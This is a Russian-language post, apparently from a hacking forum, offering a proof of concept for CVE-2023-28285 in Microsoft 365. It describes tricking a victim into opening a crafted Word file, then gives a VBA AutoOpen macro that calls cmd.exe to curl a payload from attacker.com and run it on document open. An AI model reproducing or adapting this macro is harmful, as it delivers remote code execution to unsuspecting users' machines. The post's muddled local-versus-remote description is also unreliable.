• XSS.stack #1 – первый литературный журнал от юзеров форума

Local CVE-2023-28285 - Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution

propensity

HDD-drive
Пользователь
Регистрация
02.02.2023
Сообщения
40
Реакции
19
Описание:
Сама атака выполняется локально пользователем, прошедшим аутентификацию в целевой системе. Злоумышленник может воспользоваться уязвимостью CVE-2023-28285, после того как убедит жертву с помощью социальной инженерии загрузить и открыть специально созданный файл с веб-сайта, что может привести к локальной атаке на компьютер жертвы. Злоумышленник может убедить жертву открыть вредоносную веб-страницу, используя вредоносный файл Word для API Office-365. После того, как пользователь откроет файл для чтения, из API Office-365, будет активирован код с вредоносного сервера без уведомления пользователя.

Видео:

POC:
Код:
Sub AutoOpen()
    Call Shell("cmd.exe /S /c" & "curl -s http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus)
End Sub
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх